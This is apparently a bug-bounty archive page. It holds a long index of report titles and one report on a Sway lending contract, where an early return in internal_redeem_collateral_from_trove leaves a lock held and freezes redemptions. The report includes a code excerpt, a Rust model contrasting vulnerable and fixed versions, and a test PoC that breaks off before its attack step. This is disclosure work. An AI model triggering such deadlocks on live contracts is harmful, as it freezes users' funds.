    • Attackathon _ Fuel Network 32412 - [Smart Contract - Insight] the IFP divide functions does not have
    • Attackathon _ Fuel Network 32438 - [Smart Contract - Low] Unhandled Bailout During AbstractInstructi
    • Attackathon _ Fuel Network 32439 - [Smart Contract - Low] Missing Alignment Check During AbstractIns
    • Attackathon _ Fuel Network 32453 - [Smart Contract - Low] Unhandled Side Effect During AbstractInstr
    • Attackathon _ Fuel Network 32459 - [Websites and Applications - Low] URGENT WEB funds drained using
    • Attackathon _ Fuel Network 32465 - [Blockchain_DLT - High] Abuse of CCP instruction to do cheap memo
    • Attackathon _ Fuel Network 32486 - [Blockchain_DLT - Medium] Public RPC node crashes via GraphQL API
    • Attackathon _ Fuel Network 32491 - [Smart Contract - Low] Incorrect PushA PopA Mask Calculation
    • Attackathon _ Fuel Network 32536 - [Smart Contract - Insight] The control flow graph is incorrectly
    • Attackathon _ Fuel Network 32537 - [Smart Contract - Low] Different data types can be used when init
    • Attackathon _ Fuel Network 32548 - [Smart Contract - Low] Uncaught Integer Overflow During AbstractI
    • Attackathon _ Fuel Network 32612 - [Smart Contract - Low] Lack of slot hashing at adminsw can cause
    • Attackathon _ Fuel Network 32628 - [Blockchain_DLT - Medium] A GraphQL query crashes core process
    • Attackathon _ Fuel Network 32673 - [Smart Contract - Low] Missing array length check for non constan
    • Attackathon _ Fuel Network 32695 - [Blockchain_DLT - Insight] increasing processing for public nodes
    • Attackathon _ Fuel Network 32696 - [Smart Contract - High] incorrect setting of non_negative value i
    • Attackathon _ Fuel Network 32700 - [Smart Contract - High] double increasing underlying value in cei
    • Attackathon _ Fuel Network 32703 - [Smart Contract - Low] Unexpected variable shadowing during ir ge
    • Attackathon _ Fuel Network 32706 - [Smart Contract - High] the function subtract in signed libs like
    • Attackathon _ Fuel Network 32728 - [Smart Contract - Low] Incorrect literal type inference
    • Attackathon _ Fuel Network 32730 - [Smart Contract - Low] The Sway compiler currently disallows read
    • Attackathon _ Fuel Network 32768 - [Blockchain_DLT - Medium] WDCM and WQCM doesnt respect the fuel-s
    • Attackathon _ Fuel Network 32786 - [Smart Contract - Low] incorrect set of i bits to which it should
    • Attackathon _ Fuel Network 32812 - [Smart Contract - Low] Sway-libSRC- Buffer overflow in swap_confi
    • Attackathon _ Fuel Network 32825 - [Blockchain_DLT - High] Consensus between -bit and -bit system ca
    • Attackathon _ Fuel Network 32835 - [Smart Contract - Insight] sway compiler doesnt prevent function
    • Attackathon _ Fuel Network 32849 - [Smart Contract - Low] Insufficient array construction element ty
    • Attackathon _ Fuel Network 32854 - [Smart Contract - Low] Sway-libstd-libcompiler Storage collision
    • Attackathon _ Fuel Network 32859 - [Smart Contract - Low] Incorrect argument pointer creation
    • Attackathon _ Fuel Network 32860 - [Blockchain_DLT - Insight] Resource Abuse CCP instruction is load
    • Attackathon _ Fuel Network 32872 - [Smart Contract - High] Incorrect load_store_to_memcopy optimizat
    • Attackathon _ Fuel Network 32884 - [Smart Contract - Medium] Compilerstd-lib storage collision betwee
    • Attackathon _ Fuel Network 32886 - [Smart Contract - Medium] Incorrect function purity check
    • Attackathon _ Fuel Network 32924 - [Smart Contract - Insight] sways legacy storage namespacing is br
    • Attackathon _ Fuel Network 32935 - [Smart Contract - Insight] Insufficient trait duplication check
    • Attackathon _ Fuel Network 32937 - [Smart Contract - Insight] Fallback function can be directly call
    • Attackathon _ Fuel Network 32938 - [Smart Contract - Insight] Insufficient declaration shadowing che
    • Attackathon _ Fuel Network 32965 - [Blockchain_DLT - Critical] Messages to L included even on revert
    • Attackathon _ Fuel Network 32973 - [Smart Contract - Medium] Impl block dependency overwriting
    • Attackathon _ Fuel Network 32978 - [Blockchain_DLT - Insight] isolating the node from the networkcau
    • Attackathon _ Fuel Network 32979 - [Smart Contract - Low] operations with StorageVec incorrectly rev
    • Attackathon _ Fuel Network 32987 - [Blockchain_DLT - Insight] Sending a message with ETH and data to
    • Attackathon _ Fuel Network 33039 - [Smart Contract - High] The subtraction function is not correctly
    • Attackathon _ Fuel Network 33045 - [Smart Contract - Low] Compiler Dead Code Elimination inconsisten
    • Attackathon _ Fuel Network 33101 - [Smart Contract - Insight] Associated functions that were impleme
    • Attackathon _ Fuel Network 33139 - [Smart Contract - Insight] Unreachable panic in sway compiler whe
    • Attackathon _ Fuel Network 33140 - [Smart Contract - Insight] Sway compiler crash when compile malic
    • Attackathon _ Fuel Network 33168 - [Smart Contract - High] Incorrect Sign Determination In Multiply
    • Attackathon _ Fuel Network 33170 - [Smart Contract - Medium] UFP Exp In Sway-lib Logic Vulnerability
    • Attackathon _ Fuel Network 33171 - [Smart Contract - Insight] panic on unwrapping in decl_to_type_in
    • Attackathon _ Fuel Network 33172 - [Smart Contract - Insight] OOB in type_check_analyze of ImplTrait
    • Attackathon _ Fuel Network 33175 - [Smart Contract - High] Sway-lib Subtract i Logic Vulnerability
    • Attackathon _ Fuel Network 33181 - [Smart Contract - Insight] users messages might encode incorrect
    • Attackathon _ Fuel Network 33186 - [Smart Contract - Medium] _compute_bytecode_root goes to an infin
    • Attackathon _ Fuel Network 33191 - [Smart Contract - Insight] Sway Formatting Behaves Differently Ba
    • Attackathon _ Fuel Network 33193 - [Blockchain_DLT - Medium] Fuel SDKs ABI Decoder Behaves Different
    • Attackathon _ Fuel Network 33195 - [Smart Contract - High] Incorrect Calculations in Subtraction Fun
    • Attackathon _ Fuel Network 33203 - [Smart Contract - Insight] function inlining doesnt consider asm
    • Attackathon _ Fuel Network 33207 - [Smart Contract - Insight] users created message when withdrawing
    • Attackathon _ Fuel Network 33227 - [Smart Contract - High] Lack of overflow protection in the pow fu
    • Attackathon _ Fuel Network 33233 - [Smart Contract - Medium] Incorrect Implementation of Unsigned -b
    • Attackathon _ Fuel Network 33239 - [Smart Contract - Low] Incorrect Implementation of IFP Min Functi
    • Attackathon _ Fuel Network 33240 - [Smart Contract - Insight] Incorrect Bitness in IFP Types
    • Attackathon _ Fuel Network 33242 - [Smart Contract - High] Incorrect Implementation of IFP Multiply
    • Attackathon _ Fuel Network 33248 - [Smart Contract - High] Incorrect Implementation of IFP Floor and
    • Attackathon _ Fuel Network 33267 - [Smart Contract - High] Bug in Multiply and Divide function
    • Attackathon _ Fuel Network 33286 - [Smart Contract - Insight] panic on unwrapping in type_check_trai
    • Attackathon _ Fuel Network 33295 - [Smart Contract - Low] Bug in array decoding can lead to critical
    • Attackathon _ Fuel Network 33302 - [Smart Contract - Medium] Exp function does not work correctly
    • Attackathon _ Fuel Network 33303 - [Smart Contract - Medium] Incorrect sign change
    • Attackathon _ Fuel Network 33331 - [Smart Contract - High] Overflow in Types Less Than u
    • Attackathon _ Fuel Network 33346 - [Blockchain_DLT - Low] Incorrect error handling when executing bl
    • Attackathon _ Fuel Network 33351 - [Smart Contract - Critical] ABI supertraits methods are available
    • Attackathon _ Fuel Network 33360 - [Blockchain_DLT - Medium] The typescript SDK has no awareness of
    • Attackathon _ Fuel Network 33401 - [Smart Contract - Insight] insight compiler crash - trait dummy m
    • Attackathon _ Fuel Network 33407 - [Smart Contract - Insight] Missing Zero-Check for to Address in w
    • Attackathon _ Fuel Network 33433 - [Smart Contract - Low] Self-append in Bytes data structure causes
    • Attackathon _ Fuel Network 33444 - [Smart Contract - Insight] Sway compiler crash for access out-of-
    • Attackathon _ Fuel Network 33450 - [Blockchain_DLT - Insight] fuel_gas_price_algorithm AlgorithmV ma
    • Attackathon _ Fuel Network 33451 - [Smart Contract - Medium] Incorrect code size estimation can bypa
    • Attackathon _ Fuel Network 33487 - [Smart Contract - Insight] Flags Do Not Affect Types Less Than u
    • Attackathon _ Fuel Network 33488 - [Smart Contract - Medium] Insecure implementation of StorageMap c
    • Attackathon _ Fuel Network 33519 - [Smart Contract - Critical] Silent Stack overflow on variables be
  • IDEX
    • Boost _ IDEX 34239 - [Smart Contract - Insight] Dont validate stale price in Pyth Network
    • Boost _ IDEX 34428 - [Smart Contract - Insight] Incorrect Condition in validateExitQuoteQuantityAndC
    • Boost _ IDEX 34437 - [Smart Contract - Insight] User positions could be unfairly liquidated due to s
    • Boost _ IDEX 34494 - [Smart Contract - High] Tokens deposit in ExchangeStargateVAdapterlzCompose is
    • Boost _ IDEX 34566 - [Smart Contract - Insight] Withdrawingsolwithdraw_delegatecall - Its possible f
  • Immunefi Arbitration
    • 29318 - [SC - Insight] Timelock contract should use canExecuteTransact...
    • 29341 - [SC - Insight] Unsafe Downcast vulnerability this can lead to ...
    • 29347 - [SC - Insight] Chainlinks latestRoundData might return stale o...
    • 29348 - [SC - Insight] Token price returned by PriceConsumer may be in...
    • 29384 - [SC - Insight] Malicious project can remove the ImmunefiGuard ...
    • 29432 - [SC - Low] Malicious project can grief reward payouts from...
    • 29445 - [SC - Insight] latestRoundData Call May Result Stale
    • 29467 - [SC - Low] RewardTimelockexecuteRewardTransaction - L Inco...
    • 29483 - [SC - Insight] RewardTimelockcanExecuteTransaction - Reward tr...
    • 29484 - [SC - Insight] Potential Loss of Precision in Conversion from ...
    • 29513 - [SC - Insight] Critical reentrancy vulnerability in executeRew...
    • 29604 - [SC - Insight] VaultDelegatesendReward - Token fees not subtra...
    • 29738 - [SC - Low] Missing Chainlink circuit breaker check allows ...
    • 29744 - [SC - Insight] Projects can pay rewards at up to below market...
    • 29760 - [SC - Insight] Enforcing Multiple Rewards During Arbitration B...
  • Lido: Mellow Vault
    • Boost _ Lido_ Mellow Vault 34756 - [Smart Contract - Insight] Missing calldata forwarding in Vaultde
  • Mitigation Audit | Folks Finance
    • Mitigation Audit _ Folks Finance 34929 - [Smart Contract - Critical] Accounting Discrepancy in Fee R
    • Mitigation Audit _ Folks Finance 34942 - [Smart Contract - Insight] In function function getTwapPric
    • Mitigation Audit _ Folks Finance 35089 - [Smart Contract - Insight] Malicious actor can control inte
  • Puffer Finance
    • 28612 - [SC - Insight] EigenLayers share rate can be massively inflate...
    • 28613 - [SC - Medium] User will lose funds
    • 28623 - [SC - Low] Timelock transaction that consume more than _ g...
    • 28625 - [SC - Insight] Gas griefing is possible on external call
    • 28629 - [SC - Insight] Missing restricted modifier on claimWithdrawalF...
    • 28630 - [SC - Insight] Improper Validation for Partial Filling of INCH...
    • 28632 - [SC - Insight] Setting delay at MINIMUM_DELAY in timelock fails
    • 28645 - [SC - Insight] Attacker Prevents All Users From Withdrawing Fu...
    • 28646 - [SC - Insight] Resubmission with Pause Bypass Potential Exploi...
    • 28650 - [SC - Insight] Protocol Insolvency due to the over inflated ca...
    • 28656 - [SC - Insight] Blocking redeemwithdraw from vault
    • 28660 - [SC - Insight] pufETHsrcTimelock_setDelay - L State constant M...
    • 28663 - [SC - Low] Deposit of stETH fails due to LIDOs - wei corno...
    • 28665 - [SC - Low] Underflow risk in receive function due to discr...
    • 28687 - [SC - Low] Timelocks executeTransaction incorrectly delete...
    • 28688 - [SC - Insight] Unhandled Failure of _executeTransaction Call i...
    • 28689 - [SC - Medium] incorrect lidoLockedETH value can block full re...
    • 28695 - [SC - Insight] pufETHsrcTimelockexecuteTransaction - L The tim...
    • 28698 - [SC - Insight] User can frontrun claim transaction to make cla...
    • 28702 - [SC - Insight] Malicious users can frontrun permits to DoS swaps
    • 28729 - [SC - Insight] MINIMUM_DELAY uses incorrect value of days ins...
    • 28732 - [SC - Insight] External Call from Eigen Layer can fail silentl...
    • 28773 - [SC - Insight] The function claimWithdrawalFromEigenLayer can ...
    • 28775 - [SC - Insight] pufETHsrcTimelocksolexecuteTransaction - This b...
    • 28777 - [SC - Low] pufETHsrcTimelocksolexecuteTransaction - This b...
    • 28779 - [SC - Insight] Missing sender address check in receive may lea...
    • 28788 - [SC - Critical] Slash during a withdrawal from EigenLayer will ...
    • 28789 - [SC - Low] Return value of call is not checked causing fai...
    • 28792 - [SC - Low] Return value of low level isnt checked executio...
    • 28796 - [SC - Low] The PufferVaultgetPendingLidoETHAmount will ret...
    • 28813 - [SC - Insight] PufferVaultclaimWithdrawalFromLido according to...
    • 28827 - [SC - Insight] Multi requestid claims can trigger DOS
    • 28833 - [SC - Insight] Missing slippage protection in functions deposi...
    • 28852 - [SC - Insight] Reverting permit transactions caught in the cat...
    • 28921 - [SC - Medium] Possibly protocol insolvency during a LIDO slas...
    • 28934 - [SC - Insight] TimelockcancelTransaction does not check asser...
    • 28942 - [SC - Insight] Self Destruction of inchRouter can lead to loss...
    • 28946 - [SC - Low] The assets accounting of the vault can become o...
    • 28947 - [SC - Insight] Info
    • 28964 - [SC - Insight] Claiming withdrawals from Lido can lead to unbo...
    • 28971 - [SC - Low] Double spending or double execution of transact...
    • 28991 - [SC - Insight] Contract uint delay variable cannot be set to i...
    • 29006 - [SC - Medium] Lack of Success check of the Timelock executeT...
    • 29015 - [SC - Low] Boolean return value of addresscall function no...
    • 29017 - [SC - Insight] Timelock is not capable of performing payable t...
    • 29033 - [SC - High] Queued data will be lost if Tx is unsuccessful ...
    • 29054 - [SC - Medium] Lido discounted withdrawals are not accounted for
    • 29060 - [SC - Medium] initiateETHWithdrawalsFromLido decreases totalA...
    • 29067 - [SC - Low] Puffer Finance Missing Verification of Externa...
    • 29073 - [SC - Insight] excuteTransaction in timelock contract will una...
    • 29080 - [SC - Insight] Uninitialized uups upgradeable can lead to loss...
    • 29081 - [SC - Insight] No constructor should be used to set in upgrade...
    • 29082 - [SC - Insight] Restricted modifier should not be used with int...
    • 29099 - [SC - Insight] Actual amount of stETH deposited is less than t...
    • 29106 - [SC - High] Insufficient Handling of Partial Failures in Wi...
    • 29110 - [SC - Insight] Insecure Token Allowance Management in PufferDe...
    • 29111 - [SC - Insight] Silent Failure of ERC Permit Calls in PufferDep...
    • 29116 - [SC - Low] Using deposit results in more shares for the sa...
  • Shardeum Ancillaries
    • Boost _ Shardeum_ Ancillaries 33040 - [Websites and Applications - Low] API CSRF protection bypass leading to arbitrary operator-cli command execution
    • Boost _ Shardeum_ Ancillaries 33392 - [Websites and Applications - Insight] Validator GUI password bruteforcing is possible using the proxies
    • Boost _ Shardeum_ Ancillaries 33490 - [Websites and Applications - Insight] Abusing blacklist functionality to get victims IP to be banned
    • Boost _ Shardeum_ Ancillaries 33522 - [Websites and Applications - Insight] Exposed Redis Service Vulnerability on apishardeumorg
    • Boost _ Shardeum_ Ancillaries 33558 - [Websites and Applications - Insight] In some instances the socket can be made to hang
    • Boost _ Shardeum_ Ancillaries 33571 - [Websites and Applications - Medium] Taking down the websocket server via malicious methods object override
    • Boost _ Shardeum_ Ancillaries 33577 - [Websites and Applications - Insight] Taking down the HTTP server via jayson -day vulnerability
    • Boost _ Shardeum_ Ancillaries 33692 - [Websites and Applications - Low] Reflected XSS in validator node endpoints leads to node shutdown via validator-gui
    • Boost _ Shardeum_ Ancillaries 33809 - [Websites and Applications - Insight] Blocking the user from interacting with GUI via rate-limiting abuse
    • Boost _ Shardeum_ Ancillaries 34298 - [Websites and Applications - Medium] archive-server can be killed by connected shardus-instance
    • Boost _ Shardeum_ Ancillaries 34367 - [Websites and Applications - Low] CSRF vulnerability due to missing SameSiteStrict attribute resulting blackhat to perform authenticated action
    • Boost _ Shardeum_ Ancillaries 34392 - [Websites and Applications - Medium] JSON-RPC Complete Password Recovery Through Timing Attack
    • Boost _ Shardeum_ Ancillaries 34473 - [Websites and Applications - Low] Insight XSS in json rpc server without CSP bypass
    • Boost _ Shardeum_ Ancillaries 34474 - [Websites and Applications - Insight] SQL injection in json-rpc-server within thetxStatusSaver function via the IP argument leads to application shutdown
    • Boost _ Shardeum_ Ancillaries 34475 - [Websites and Applications - Low] CSRF in Json RPC Server allows requesting authenticated API endpoints
    • Boost _ Shardeum_ Ancillaries 34492 - [Websites and Applications - Insight] DoS via unbounded tx id list processing in api endpoints
    • Boost _ Shardeum_ Ancillaries 34508 - [Websites and Applications - Critical] Malicious archiver can overwrite account data on any active archiver
  • Shardeum Core
    • 32942 - [BC - Low] The ChainID and URL parameters that can modify ...
    • 32982 - [BC - Critical] Crashing all Validators Vulnerability in eth_g...
    • 32993 - [BC - Critical] Crashing Validators by triggering an uncaught e...
    • 33044 - [BC - Medium] Preventing the network from loading by disconne...
    • 33086 - [BC - Critical] Complete shutdown of the transaction processing...
    • 33151 - [BC - Critical] Front running initial account data distribution
    • 33222 - [BC - Critical] An attacker can control which nodes can and can...
    • 33254 - [BC - Medium] The signature used to Gossip an UnjoinRequest h...
    • 33277 - [BC - Critical] Validators can be crashed via GET
    • 33278 - [BC - Critical] Improper input validation leads to DOS and tota...
    • 33395 - [BC - Insight] DoS attack on peer nodes through gossip-valid-j...
    • 33424 - [BC - Critical] Improper input validation in safeJsonParse lead...
    • 33428 - [BC - Critical] Validators can be crashed via pp
    • 33473 - [BC - High] Cross-chain replay attacks are possible due to ...
    • 33483 - [BC - Critical] shardeum validator bypass loop breaking increme...
    • 33520 - [BC - Insight] Inconsistent consensus issue for BlakeF precomp...
    • 33576 - [BC - High] Lack of deduplication in joinarchiver requests ...
    • 33632 - [BC - Critical] Signature forgery on behalf of other nodes lead...
    • 33637 - [BC - Critical] In get_tx_timestamp a prototype pollution bri...
    • 33638 - [BC - Critical] In remove_timestamp_cache a prototype polluti...
    • 33655 - [BC - Critical] Complete shutdown of the transaction processing...
    • 33696 - [BC - Critical] Failure to validate golden ticket admin cert
    • 33735 - [BC - Insight] Network split due to the sync issue in PP modul...
    • 33745 - [BC - Critical] A math quirk in Javascript allows anyone to tak...
    • 33750 - [BC - Critical] Abusing setCertTime Transactions to drain node ...
    • 33766 - [BC - Critical] Improper input validation in TransactionConsenu...
    • 33813 - [BC - Insight] Double slashing of validators
    • 33848 - [BC - High] For the first cycles of the network a maliciou...
    • 33872 - [BC - Critical] Infinite loop in shardeum
    • 33922 - [BC - Critical] Steal Rewards and Take over Network by Faking A...
    • 33925 - [BC - Critical] Improper input validation in fixDeserializedWra...
    • 33941 - [BC - Critical] A missing check for the type of a variable allo...
    • 33946 - [BC - Critical] Lack of voter deduplication in sync_trie_hashes...
    • 33963 - [BC - Critical] Crashing the network by filling timestamp cache...
    • 33972 - [BC - Critical] Inflating the votes of the hash for a malicious...
    • 34012 - [BC - Critical] Improper input validation in repair_oos_account...
    • 34019 - [BC - Critical] Lack of vote validation in sync_trie_hashes lea...
    • 34020 - [BC - Critical] An alternative entry point with a separated but...
    • 34053 - [BC - Critical] Malicious HTTP responses allow systemic applica...
    • 34093 - [BC - Critical] lib-net can be used to force oom reap of shardu...
    • 34201 - [BC - Critical] Prototype pollution vulnerability in remove_tim...
    • 34252 - [BC - Critical] Bypass Certificate Signing Validation
    • 34349 - [BC - High] Archiver Join Limit Logic Error
    • 34353 - [BC - Critical] Killing nodes by polluting tx timestamp cache o...
    • 34364 - [BC - Insight] pp deserialization denial of service issue
    • 34422 - [BC - High] Forcing the new POQo system to fail preventing ...
    • 34456 - [BC - Critical] Lack of consensus validation in repair_oos_acco...
    • 34476 - [BC - Critical] remove_timestamp_cache prototype pollution lead...
    • 34481 - [BC - Critical] Bypassing sender verification in gossip-final-s...
    • 34484 - [BC - Critical] Tricking legit node to signed maliciously contr...
    • 34489 - [BC - Insight] ActivetsValidateRecordTypes do not check all th...
    • 34500 - [BC - Critical] Prototype pollution vulnerability in get_tx_tim...
  • ThunderNFT | IOP
    • IOP _ ThunderNFT 34455 - [Smart Contract - Low] Double Token Vulnerability leads to drain funds
    • IOP _ ThunderNFT 34496 - [Smart Contract - High] Users cant withdraw their funds for removed assets
    • IOP _ ThunderNFT 34519 - [Smart Contract - High] users cant withdraw their tokens when specific asse
    • IOP _ ThunderNFT 34522 - [Smart Contract - Low] Self-transfer would inflate the balance
    • IOP _ ThunderNFT 34534 - [Smart Contract - Critical] Maker will always only get token even if specif
    • IOP _ ThunderNFT 34542 - [Smart Contract - Insight] Not Handling Balance Entries Properly in the Wit
    • IOP _ ThunderNFT 34545 - [Smart Contract - Low] Smart contract can be taken over by malicious user b
    • IOP _ ThunderNFT 34560 - [Smart Contract - Critical] Updating sell-maker-orders does not provide ref
    • IOP _ ThunderNFT 34565 - [Smart Contract - High] Selling maker cant cancel to retrieve his funds whe
    • IOP _ ThunderNFT 34567 - [Smart Contract - Medium] users with current bid order can not update their
    • IOP _ ThunderNFT 34578 - [Smart Contract - Insight] unds Not Locked During Order Placement
    • IOP _ ThunderNFT 34585 - [Smart Contract - High] Permanent freezing of NFTS that seller deposit into
    • IOP _ ThunderNFT 34587 - [Smart Contract - High] Users might temporarily get their funds locked in P
    • IOP _ ThunderNFT 34605 - [Smart Contract - Critical] ERC tokens can be stolen because the amount is
    • IOP _ ThunderNFT 34629 - [Smart Contract - Critical] Theft of Deposited Funds
    • IOP _ ThunderNFT 34630 - [Smart Contract - Critical] Incorrect Token Sale Amount
    • IOP _ ThunderNFT 34636 - [Smart Contract - Critical] The amount is set to when creating the Executio
    • IOP _ ThunderNFT 34642 - [Smart Contract - High] strategy de-listing causes sellers NFTs locked on T
    • IOP _ ThunderNFT 34659 - [Smart Contract - Low] Pool Balance Inflation
    • IOP _ ThunderNFT 34677 - [Smart Contract - Insight] NFTs can not be canceled since the cancel_order
    • IOP _ ThunderNFT 34702 - [Smart Contract - Low] the function register_royalty_info does not allow to
    • IOP _ ThunderNFT 34714 - [Smart Contract - Medium] owner of NFT who have sell orderlisting NFT can n
    • IOP _ ThunderNFT 34736 - [Smart Contract - Critical] ERC tokens are stuck on the contract if more th
    • IOP _ ThunderNFT 34760 - [Smart Contract - Low] Off-by-one error in get_supported_asset
    • IOP _ ThunderNFT 34761 - [Smart Contract - Low] Off-by-one error in get_whitelisted_strategy
    • IOP _ ThunderNFT 34791 - [Smart Contract - Low] Incompatibility with SRC might lead to inability of
    • IOP _ ThunderNFT 34800 - [Smart Contract - Critical] Improper input validation in order update funct
    • IOP _ ThunderNFT 34816 - [Smart Contract - High] users cant call update_order to update the strategy
    • IOP _ ThunderNFT 34839 - [Smart Contract - Low] Royalty Fee limit is not enforced for registered col
    • IOP _ ThunderNFT 34848 - [Smart Contract - Low] Incorrect verification of deposit asset leads to cre
    • IOP _ ThunderNFT 34906 - [Smart Contract - Low] Existing Sell order can be executed despite payment
    • IOP _ ThunderNFT 34930 - [Smart Contract - Critical] User can only trade token when ERC is used
    • IOP _ ThunderNFT 34934 - [Smart Contract - Critical] thunder_exchangeupdate_order can be abused to s
    • IOP _ ThunderNFT 34943 - [Smart Contract - High] User cant withdraw asset from pool after asset_mana
    • IOP _ ThunderNFT 34949 - [Smart Contract - Critical] Missing proper validation when updating order
    • IOP _ ThunderNFT 34955 - [Smart Contract - Critical] Nfts of type may be stolen by updating an order
    • IOP _ ThunderNFT 34957 - [Smart Contract - Critical] executionResults always returns an amount of le
    • IOP _ ThunderNFT 34958 - [Smart Contract - Critical] Incorrect Setting of Amount in ExecutionResult
    • IOP _ ThunderNFT 34962 - [Smart Contract - Low] tranfer_from function have critical issue which lead
    • IOP _ ThunderNFT 34963 - [Smart Contract - Insight] Invalid orders persist in storage maps with no i
    • IOP _ ThunderNFT 34964 - [Smart Contract - Low] Faulty Index out of Bounds
    • IOP _ ThunderNFT 34966 - [Smart Contract - High] Royalty or protocol fee of will DoS executing order
    • IOP _ ThunderNFT 34967 - [Smart Contract - Insight] Insights Report
    • IOP _ ThunderNFT 34973 - [Smart Contract - Low] royalty_managerregister_royalty_info might not work
    • IOP _ ThunderNFT 34975 - [Smart Contract - Low] Read out of index
    • IOP _ ThunderNFT 34980 - [Smart Contract - Critical] Order side manipulation can lead to theft of NF
  • ZeroLend
    • 28875 - [SC - Medium] Unauthorized minting of vested NFTs
    • 28885 - [SC - Medium] Lack of check for Lockend in merge LockerToken ...
    • 28892 - [SC - Medium] ZeroLockermerge can make a voting lock last lon...
    • 28910 - [SC - High] Bool check wrong in registerGauge
    • 28912 - [SC - Critical] Attackers can control the vote result and ampli...

#37323 [SC-Critical] Permanent dead Lock in internal_redeem_collateral_from_trove


Submitted on Dec 2nd 2024 at 08:51:54 UTC by @Catchme for

  • Report ID: #37323

  • Report Type: Smart Contract

  • Report severity: Critical

  • Target: https://github.com/Hydrogen-Labs/fluid-protocol/tree/main/contracts/trove-manager-contract/src/main.sw

  • Impacts:

    • Permanent freezing of funds

    • Permanent freezing of unclaimed yield

    • Smart contract unable to operate due to lack of token funds

    • Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)

Description

Brief/Intro

The lock in internal_redeem_collateral_from_trove is not released, causing a deadlock.

Vulnerability Details

In the function internal_redeem_collateral_from_trove, when new_debt < MIN_NET_DEBT the function returns early without releasing the lock_internal_redeem_collateral_from_trove lock, causing a deadlock.

// contracts/trove-manager-contract/src/main.sw
...

#[storage(read, write)]
fn internal_redeem_collateral_from_trove(
...
    // If the trove's debt is fully redeemed, close the trove
    if (new_debt == 0) {
        internal_remove_stake(borrower);
        internal_close_trove(borrower, Status::ClosedByRedemption);
        internal_redeem_close_trove(borrower, 0, new_coll);
    } else {
        // Calculate the new nominal collateralization ratio
        let new_nicr = fm_compute_nominal_cr(new_coll, new_debt);
        // If the new debt is below the minimum allowed, cancel the partial redemption
        
        ///////////////////////////////////////////////////////////
        ///////////////////////////////////////////////////////////
        ///////////////////////////////////////////////////////////
        if (new_debt < MIN_NET_DEBT) {
            single_redemption_values.cancelled_partial = true;  
            return single_redemption_values;                   
            // VULN : The `lock_internal_redeem_collateral_from_trove` is not released. 
            
        }
        ///////////////////////////////////////////////////////////
        ///////////////////////////////////////////////////////////
        ///////////////////////////////////////////////////////////
        
        // Re-insert the trove into the sorted list with its new NICR
...
}
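The missing release and one way to close it, as an added Rust model that is neither the protocol's Sway code nor the reporter's PoC. The boolean lock, the check-on-entry, the MIN_NET_DEBT value of 500 and all type and function names are assumptions, chosen to mirror the 2000 debt / 1600 redemption case used in the proof of concept.

```rust
const MIN_NET_DEBT: u64 = 500; // assumed value for this model

#[derive(Debug, PartialEq)]
pub struct Redemption { pub usdf_lot: u64, pub cancelled_partial: bool }

#[derive(Debug, PartialEq)]
pub enum RedeemError { Locked } // stands in for the "is locked" revert

pub struct TroveManager {
    pub lock: bool, // models lock_internal_redeem_collateral_from_trove
    pub debt: u64,  // debt of the single trove in this model
}

impl TroveManager {
    // Redemption body shared by both variants; it contains the early return.
    fn body(&mut self, max_usdf: u64) -> Redemption {
        let usdf_lot = max_usdf.min(self.debt);
        let new_debt = self.debt - usdf_lot;
        if new_debt != 0 && new_debt < MIN_NET_DEBT {
            return Redemption { usdf_lot, cancelled_partial: true }; // trove unchanged
        }
        self.debt = new_debt;
        Redemption { usdf_lot, cancelled_partial: false }
    }

    // Shape reported on the page: the cancelled path returns with the lock held.
    pub fn redeem_vulnerable(&mut self, max_usdf: u64) -> Result<Redemption, RedeemError> {
        if self.lock { return Err(RedeemError::Locked); }
        self.lock = true;
        let r = self.body(max_usdf);
        if r.cancelled_partial { return Ok(r); } // lock never cleared
        self.lock = false;
        Ok(r)
    }

    // Hardened shape: one release point after the body covers every return path.
    pub fn redeem_fixed(&mut self, max_usdf: u64) -> Result<Redemption, RedeemError> {
        if self.lock { return Err(RedeemError::Locked); }
        self.lock = true;
        let r = self.body(max_usdf);
        self.lock = false;
        Ok(r)
    }
}

fn main() {
    let mut tm = TroveManager { lock: false, debt: 2000 };
    println!("{:?}", tm.redeem_vulnerable(1600)); // cancelled, lock left set
    println!("{:?}", tm.redeem_vulnerable(20)); // Err(Locked)
    println!("{:?}", TroveManager { lock: false, debt: 2000 }.redeem_fixed(1600));
}
```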

Impact Details

This vulnerability can cause a permanent deadlock in the contract.

References

https://github.com/Hydrogen-Labs/fluid-protocol/blob/main/contracts/trove-manager-contract/src/main.sw#L819

Proof of Concept


use fuels::{prelude::*, types::Identity};
use test_utils::data_structures::{ContractInstance, PRECISION};
use test_utils::interfaces::oracle::oracle_abi;
use test_utils::interfaces::protocol_manager::ProtocolManager;
use test_utils::interfaces::pyth_oracle::PYTH_TIMESTAMP;
use test_utils::utils::print_response;
use test_utils::{
    interfaces::{
        active_pool::active_pool_abi,
        borrow_operations::{borrow_operations_abi, BorrowOperations},
        coll_surplus_pool::coll_surplus_pool_abi,
        protocol_manager::protocol_manager_abi,
        pyth_oracle::{pyth_oracle_abi, pyth_price_feed},
        token::token_abi,
        trove_manager::{trove_manager_abi, trove_manager_utils, Status},
    },
    setup::common::setup_protocol,
    utils::with_min_borrow_fee,
};

#[tokio::test]
async fn test_dead_lock() {
    let (contracts, _admin, mut wallets) = setup_protocol(5, true, false).await;

    let healthy_wallet1 = wallets.pop().unwrap();

    let balance: u64 = 12_000 * PRECISION;

    token_abi::mint_to_id(
        &contracts.asset_contracts[0].asset,
        balance,
        Identity::Address(healthy_wallet1.address().into()),
    )
    .await;

    let borrow_operations_healthy_wallet1 = ContractInstance::new(
        BorrowOperations::new(
            contracts.borrow_operations.contract.contract_id().clone(),
            healthy_wallet1.clone(),
        ),
        contracts.borrow_operations.implementation_id.clone(),
    );

    let coll1 = 6000 * PRECISION;
    let debt1 = 2000 * PRECISION;

    oracle_abi::set_debug_timestamp(&contracts.asset_contracts[0].oracle, PYTH_TIMESTAMP).await;
    pyth_oracle_abi::update_price_feeds(
        &contracts.asset_contracts[0].mock_pyth_oracle,
        pyth_price_feed(1),
    )
    .await;

    borrow_operations_abi::open_trove(
        &borrow_operations_healthy_wallet1,
        &contracts.asset_contracts[0].oracle,
        &contracts.asset_contracts[0].mock_pyth_oracle,
        &contracts.asset_contracts[0].mock_redstone_oracle,
        &contracts.asset_contracts[0].asset,
        &contracts.usdf,
        &contracts.fpt_staking,
        &contracts.sorted_troves,
        &contracts.asset_contracts[0].trove_manager,
        &contracts.active_pool,
        coll1,
        debt1,
        Identity::Address(Address::zeroed()),
        Identity::Address(Address::zeroed()),
    )
    .await
    .unwrap();

    //------------------------------------------------
    // Here is the PoC
